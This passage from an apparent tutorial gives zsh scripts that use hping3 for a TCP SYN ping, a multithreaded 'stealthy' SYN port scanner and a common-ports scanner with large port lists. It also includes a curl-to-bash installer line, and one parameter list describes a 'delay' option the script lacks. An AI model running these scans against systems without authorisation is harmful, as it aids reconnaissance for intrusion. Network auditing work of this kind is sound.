        ((FAIL_COUNT++))
    elif echo "$line" | grep -q "Unreachable\|timeout\|no answer"; then
        # No response or error
        echo -e "${RED}✗ No response: $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q "HPING.*mode set"; then
        # Header information
        echo -e "${YELLOW}$line${NC}"
    elif echo "$line" | grep -q "Statistics\|transmitted\|received\|packet loss"; then
        # Statistics line
        echo -e "${CYAN}$line${NC}"
    else
        echo "$line"
    fi
done

# Get exit status
EXIT_STATUS=$?

# Parse final statistics from hping3 output
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Extract statistics from output
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
    STATS_LINE=$(grep -E "packets transmitted|received|packet loss" "$TMPFILE" | tail -1)
    if [[ -n "$STATS_LINE" ]]; then
        echo -e "${GREEN}          STATISTICS${NC}"
        echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
        
        # Parse transmitted, received, loss
        TRANSMITTED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ packets transmitted" | grep -oE "^[0-9]+")
        RECEIVED=$(echo "$STATS_LINE" | grep -oE "[0-9]+ received" | grep -oE "^[0-9]+")
        LOSS=$(echo "$STATS_LINE" | grep -oE "[0-9]+% packet loss" | grep -oE "^[0-9]+")
        
        if [[ -n "$TRANSMITTED" ]] && [[ -n "$RECEIVED" ]]; then
            echo -e "  ${BLUE}Packets Sent:${NC}     $TRANSMITTED"
            echo -e "  ${BLUE}Replies Received:${NC} $RECEIVED"
            echo -e "  ${BLUE}Packet Loss:${NC}      ${LOSS:-0}%"
            
            # Port status determination
            if [[ "$RECEIVED" -gt 0 ]]; then
                echo -e "  ${BLUE}Port Status:${NC}      ${GREEN}OPEN (Responding)${NC}"
            else
                echo -e "  ${BLUE}Port Status:${NC}      ${RED}CLOSED/FILTERED${NC}"
            fi
        fi
        
        # RTT statistics if available
        if [[ "$SUCCESS_COUNT" -gt 0 ]] && [[ "$TOTAL_RTT" != "0" ]]; then
            AVG_RTT=$(echo "scale=2; $TOTAL_RTT / $SUCCESS_COUNT" | bc)
            echo ""
            echo -e "  ${BLUE}RTT Statistics:${NC}"
            echo -e "    Min: ${MIN_RTT}ms"
            echo -e "    Max: ${MAX_RTT}ms"
            echo -e "    Avg: ${AVG_RTT}ms"
        fi
    fi
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Final status message
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
    if grep -q "flags=SA" "$TMPFILE" 2>/dev/null; then
        echo -e "${GREEN}[✓] TCP port $PORT on $TARGET is OPEN${NC}"
        echo -e "${GREEN}    Service: $SERVICE_NAME${NC}"
    elif grep -q "flags=RA" "$TMPFILE" 2>/dev/null; then
        echo -e "${YELLOW}[!] TCP port $PORT on $TARGET is CLOSED${NC}"
        echo -e "${YELLOW}    The host is reachable but the port is not accepting connections${NC}"
    else
        echo -e "${RED}[✗] TCP port $PORT on $TARGET is FILTERED or host is down${NC}"
        echo -e "${RED}    No response received - possible firewall blocking${NC}"
    fi
else
    echo -e "${RED}[✗] TCP SYN ping failed (exit code: $EXIT_STATUS)${NC}"
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit $EXIT_STATUS
EOF

chmod +x ./tcp_syn_ping.sh

How to Run:

# Test default HTTP port (80)
./tcp_syn_ping.sh google.com

# Test HTTPS port
./tcp_syn_ping.sh google.com 443

# Test SSH port with 5 packets
./tcp_syn_ping.sh ssh.example.com 22 5

# Test with custom interval (0.5 seconds)
./tcp_syn_ping.sh 192.168.1.1 80 10 0.5

# Test database ports
./tcp_syn_ping.sh db.example.com 3306      # MySQL
./tcp_syn_ping.sh db.example.com 5432      # PostgreSQL
./tcp_syn_ping.sh cache.example.com 6379   # Redis

# Get help
./tcp_syn_ping.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to test
– **port** (optional, default: 80): TCP port to send SYN packets to
– **count** (optional, default: 1): Number of SYN packets to send

Response Analysis:
– **SYN+ACK response**: Port is open
– **RST response**: Port is closed
– **No response**: Port is filtered

Script 4: TCP SYN Port Scanner

Purpose:
Performs TCP SYN scanning across a range of ports to identify open services. This is a stealthy scanning technique that doesn’t complete the TCP handshake.

Create the Script:

cat > ./tcp_syn_scan.sh << 'EOF'
#!/bin/zsh

# TCP SYN Port Scanner using hping3
# Performs a TCP SYN scan (half-open scan) on a range of ports
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
START_PORT="${2:-1}"
END_PORT="${3:-1000}"
THREADS="${4:-50}"

# Common service ports
declare -A SERVICE_PORTS=(
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [80]="HTTP"
    [110]="POP3"
    [111]="RPC"
    [135]="MSRPC"
    [139]="NetBIOS"
    [143]="IMAP"
    [443]="HTTPS"
    [445]="SMB"
    [587]="SMTP-TLS"
    [993]="IMAPS"
    [995]="POP3S"
    [1433]="MSSQL"
    [1521]="Oracle"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [5900]="VNC"
    [6379]="Redis"
    [8080]="HTTP-Alt"
    [8443]="HTTPS-Alt"
    [9200]="Elasticsearch"
    [11211]="Memcached"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./tcp_syn_scan.sh"
    echo "Usage: $script_name <target> [start_port] [end_port] [threads]"
    echo "  target     - Hostname or IP address to scan"
    echo "  start_port - Starting port number (default: 1)"
    echo "  end_port   - Ending port number (default: 1000)"
    echo "  threads    - Number of parallel threads (default: 50)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                # Scan ports 1-1000"
    echo "  $script_name 192.168.1.1 1 100         # Scan ports 1-100"
    echo "  $script_name server.local 20 25        # Scan ports 20-25"
    echo "  $script_name example.com 1 65535 100   # Full scan with 100 threads"
    echo ""
    echo "Common Port Ranges:"
    echo "  1-1000      - Common ports (default)"
    echo "  1-65535     - All ports"
    echo "  20-445      - Common services"
    echo "  1024-5000   - User ports"
    echo "  49152-65535 - Dynamic/private ports"
}

# Function to validate port range
validate_ports() {
    local start=$1
    local end=$2
    
    if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Port numbers must be integers${NC}"
        return 1
    fi
    
    if [ "$start" -lt 1 ] || [ "$start" -gt 65535 ] || [ "$end" -lt 1 ] || [ "$end" -gt 65535 ]; then
        echo -e "${RED}Error: Port numbers must be between 1-65535${NC}"
        return 1
    fi
    
    if [ "$start" -gt "$end" ]; then
        echo -e "${RED}Error: Start port must be less than or equal to end port${NC}"
        return 1
    fi
    
    return 0
}

# Function to get service name
get_service() {
    local port=$1
    if [[ -n "${SERVICE_PORTS[$port]}" ]]; then
        echo "${SERVICE_PORTS[$port]}"
    else
        # Try to get from system services file
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "unknown"
        fi
    fi
}

# Function to scan a single port
scan_port() {
    local target=$1
    local port=$2
    local tmpfile=$3
    
    # Run hping3 with timeout
    local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null)
    
    if echo "$result" | grep -q "flags=SA"; then
        # Port is open (SYN+ACK received)
        local service=$(get_service "$port")
        echo "$port:open:$service" >> "$tmpfile"
        echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
    elif echo "$result" | grep -q "flags=RA"; then
        # Port is closed (RST+ACK received)
        echo "$port:closed" >> "${tmpfile}.closed"
    else
        # Port is filtered or no response
        echo "$port:filtered" >> "${tmpfile}.filtered"
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate port range
if ! validate_ports "$START_PORT" "$END_PORT"; then
    exit 1
fi

# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
    echo -e "${RED}Error: Threads must be between 1-500${NC}"
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check for timeout command
if ! command -v gtimeout &> /dev/null && ! command -v timeout &> /dev/null; then
    echo -e "${YELLOW}Warning: timeout command not found${NC}"
    echo "Install with: brew install coreutils"
    echo "Continuing without timeout protection..."
    echo ""
    
    # Create wrapper function for timeout
    timeout() {
        shift  # Remove the timeout value
        "$@"   # Execute the command directly
    }
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║        TCP SYN PORT SCANNER            ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}        $TARGET"
echo -e "  ${BLUE}Port Range:${NC}    $START_PORT - $END_PORT"
echo -e "  ${BLUE}Total Ports:${NC}   $TOTAL_PORTS"
echo -e "  ${BLUE}Threads:${NC}       $THREADS"
echo -e "  ${BLUE}Scan Type:${NC}     TCP SYN (Half-open)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Resolve target to IP
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
    TARGET_IP="$TARGET"
    echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
    echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi

# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT

# Start time
START_TIME=$(date +%s)

echo ""
echo -e "${GREEN}[+] Starting TCP SYN scan...${NC}"
echo -e "${YELLOW}[*] Scanning $TOTAL_PORTS ports with $THREADS parallel threads${NC}"
echo ""

# Progress tracking
SCANNED=0
JOBS_COUNT=0

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
    # Launch scan in background
    scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
    
    # Manage parallel jobs
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
        sleep 0.05
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_PORTS"
done

# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Count results
OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0

if [ -f "$OPEN_PORTS_FILE" ]; then
    OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.closed" ]; then
    CLOSED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.closed" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.filtered" ]; then
    FILTERED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.filtered" | tr -d ' ')
fi

# Display open ports
if [ "$OPEN_COUNT" -gt 0 ]; then
    echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
    echo ""
    echo -e "${MAGENTA}Open Ports:${NC}"
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    printf "${WHITE}%-10s %-15s %s${NC}\n" "PORT" "STATE" "SERVICE"
    echo -e "${CYAN}────────────────────────────────────────${NC}"
    
    # Sort and display open ports
    sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
        printf "${GREEN}%-10s${NC} ${GREEN}%-15s${NC} ${YELLOW}%s${NC}\n" "$port/tcp" "$state" "$service"
    done
    
    # Save detailed report
    REPORT_FILE="tcp_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "TCP SYN Scan Report"
        echo "==================="
        echo "Target: $TARGET ($TARGET_IP)"
        echo "Port Range: $START_PORT - $END_PORT"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo "Scan Rate: $(( TOTAL_PORTS / (DURATION + 1) )) ports/second"
        echo ""
        echo "Results Summary:"
        echo "----------------"
        echo "Open ports: $OPEN_COUNT"
        echo "Closed ports: $CLOSED_COUNT"
        echo "Filtered ports: $FILTERED_COUNT"
        echo ""
        echo "Open Ports Detail:"
        echo "------------------"
        sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
            printf "%-10s %-15s %s\n" "$port/tcp" "$state" "$service"
        done
    } > "$REPORT_FILE"
    
    echo ""
    echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
    echo -e "${BLUE}[*] Detailed report saved to: $REPORT_FILE${NC}"
else
    echo -e "${YELLOW}[-] No open ports found in the specified range${NC}"
    echo -e "${YELLOW}    Possible reasons:${NC}"
    echo -e "${YELLOW}    • All ports are closed or filtered${NC}"
    echo -e "${YELLOW}    • Firewall is blocking SYN packets${NC}"
    echo -e "${YELLOW}    • Target is down or unreachable${NC}"
fi

# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}           STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Ports Scanned:${NC}  $TOTAL_PORTS"
echo -e "  ${GREEN}Open:${NC}           $OPEN_COUNT"
echo -e "  ${RED}Closed:${NC}         $CLOSED_COUNT"
echo -e "  ${YELLOW}Filtered:${NC}       $FILTERED_COUNT"
echo -e "  ${BLUE}Scan Duration:${NC}  ${DURATION} seconds"
echo -e "  ${BLUE}Scan Rate:${NC}      ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./tcp_syn_scan.sh

How to Run:

# Scan default ports 1-1000
./tcp_syn_scan.sh example.com

# Scan specific range
./tcp_syn_scan.sh 192.168.1.1 1 100

# Quick scan of common services
./tcp_syn_scan.sh server.local 20 445

# Full port scan with 100 threads
./tcp_syn_scan.sh example.com 1 65535 100

# Scan web ports
./tcp_syn_scan.sh webserver.com 80 443

# Scan database ports
./tcp_syn_scan.sh dbserver.com 3300 3400

# Get help
./tcp_syn_scan.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to scan
– **start_port** (optional, default: 1): First port in the range to scan
– **end_port** (optional, default: 1000): Last port in the range to scan
– **delay** (optional, default: u1000): Delay between packets (u=microseconds)

Script 5: Common Ports Scanner:

Purpose:
Scans a predefined list of commonly used ports with service identification. This is more efficient than scanning large port ranges when looking for standard services.

Create the Script:

brew install coreutils

cat > ./common_ports_scan.sh << 'EOF'
#!/bin/zsh

# Common Ports Scanner using hping3
# Scans commonly used ports with predefined or custom port lists
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
SCAN_TYPE="${2:-default}"
CUSTOM_PORTS="$3"
THREADS="${4:-50}"

# Port categories
declare -A PORT_CATEGORIES=(
    ["default"]="21,22,23,25,53,80,110,143,443,445,3306,3389,5432,8080,8443"
    ["web"]="80,443,8080,8443,8000,8888,3000,5000,9000"
    ["mail"]="25,110,143,465,587,993,995"
    ["database"]="1433,1521,3306,5432,5984,6379,7000,7001,8086,9042,9200,11211,27017"
    ["remote"]="22,23,3389,5900,5901,5902"
    ["file"]="20,21,69,139,445,873,2049"
    ["top100"]="7,9,13,21,22,23,25,26,37,53,79,80,81,88,106,110,111,113,119,135,139,143,144,179,199,389,427,443,444,445,465,513,514,515,543,544,548,554,587,631,646,873,990,993,995,1025,1026,1027,1028,1029,1110,1433,1521,1701,1720,1723,1755,1900,2000,2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000,6001,6379,6646,7000,7070,8000,8008,8009,8080,8081,8443,8888,9100,9200,9999,10000,27017,32768,49152,49153,49154,49155,49156,49157"
    ["top1000"]="1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6379,6389,6502,6510,6543,6547,6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,9300,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11211,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27017,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"
)

# Service mapping
declare -A SERVICE_NAMES=(
    [20]="FTP-Data"
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [67]="DHCP"
    [68]="DHCP"
    [69]="TFTP"
    [80]="HTTP"
    [110]="POP3"
    [123]="NTP"
    [135]="MSRPC"
    [137]="NetBIOS-NS"
    [138]="NetBIOS-DGM"
    [139]="NetBIOS-SSN"
    [143]="IMAP"
    [161]="SNMP"
    [162]="SNMP-Trap"
    [389]="LDAP"
    [443]="HTTPS"
    [445]="SMB"
    [465]="SMTPS"
    [514]="Syslog"
    [515]="LPD"
    [587]="SMTP-TLS"
    [636]="LDAPS"
    [873]="Rsync"
    [993]="IMAPS"
    [995]="POP3S"
    [1433]="MSSQL"
    [1521]="Oracle"
    [1723]="PPTP"
    [2049]="NFS"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [5900]="VNC"
    [5984]="CouchDB"
    [6379]="Redis"
    [7000]="Cassandra"
    [8000]="HTTP-Alt"
    [8080]="HTTP-Proxy"
    [8086]="InfluxDB"
    [8443]="HTTPS-Alt"
    [8888]="HTTP-Alt2"
    [9000]="SonarQube"
    [9042]="Cassandra-CQL"
    [9200]="Elasticsearch"
    [11211]="Memcached"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./common_ports_scan.sh"
    echo "Usage: $script_name <target> [scan_type|custom_ports] [threads]"
    echo ""
    echo "Scan Types:"
    echo "  default    - Top 15 most common ports (default)"
    echo "  web        - Web server ports (80, 443, 8080, etc.)"
    echo "  mail       - Mail server ports (25, 110, 143, etc.)"
    echo "  database   - Database ports (MySQL, PostgreSQL, MongoDB, etc.)"
    echo "  remote     - Remote access ports (SSH, RDP, VNC, etc.)"
    echo "  file       - File sharing ports (FTP, SMB, NFS, etc.)"
    echo "  top100     - Top 100 most common ports"
    echo "  top1000    - Top 1000 most common ports"
    echo "  custom     - Specify custom ports as comma-separated list"
    echo ""
    echo "Parameters:"
    echo "  target     - Hostname or IP address to scan"
    echo "  scan_type  - Type of scan or comma-separated port list"
    echo "  threads    - Number of parallel threads (default: 50)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com                    # Scan default ports"
    echo "  $script_name example.com web                # Scan web ports"
    echo "  $script_name example.com database           # Scan database ports"
    echo "  $script_name example.com top100             # Scan top 100 ports"
    echo "  $script_name example.com \"22,80,443,3306\"   # Custom ports"
    echo "  $script_name example.com top1000 100        # Top 1000 with 100 threads"
}

# Function to get service name
get_service_name() {
    local port=$1
    if [[ -n "${SERVICE_NAMES[$port]}" ]]; then
        echo "${SERVICE_NAMES[$port]}"
    else
        # Try to get from system services
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "Unknown"
        fi
    fi
}

# Function to scan a single port
scan_port() {
    local target=$1
    local port=$2
    local tmpfile=$3
    
    # Run hping3 with timeout
    local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null || true)
    
    if echo "$result" | grep -q "flags=SA"; then
        # Port is open (SYN+ACK received)
        local service=$(get_service_name "$port")
        echo "$port:$service" >> "$tmpfile"
        echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Determine ports to scan
if [[ "$SCAN_TYPE" =~ ^[0-9,]+$ ]]; then
    # Custom ports provided
    PORTS_TO_SCAN="$SCAN_TYPE"
    SCAN_DESCRIPTION="Custom ports"
elif [[ -n "${PORT_CATEGORIES[$SCAN_TYPE]}" ]]; then
    # Predefined category
    PORTS_TO_SCAN="${PORT_CATEGORIES[$SCAN_TYPE]}"
    SCAN_DESCRIPTION="$SCAN_TYPE ports"
else
    # Invalid scan type, use default
    PORTS_TO_SCAN="${PORT_CATEGORIES[default]}"
    SCAN_DESCRIPTION="Default common ports"
    if [[ -n "$SCAN_TYPE" ]] && [[ "$SCAN_TYPE" != "default" ]]; then
        echo -e "${YELLOW}Warning: Unknown scan type '$SCAN_TYPE', using default${NC}"
    fi
fi

# Parse threads parameter
if [[ -n "$CUSTOM_PORTS" ]] && [[ "$CUSTOM_PORTS" =~ ^[0-9]+$ ]]; then
    THREADS="$CUSTOM_PORTS"
elif [[ -n "$3" ]] && [[ "$3" =~ ^[0-9]+$ ]]; then
    THREADS="$3"
fi

# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
    THREADS=50
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check for timeout command and create appropriate wrapper
if command -v gtimeout &> /dev/null; then
    # macOS with coreutils installed
    timeout() {
        gtimeout "$@"
    }
elif command -v timeout &> /dev/null; then
    # Linux or other systems with timeout
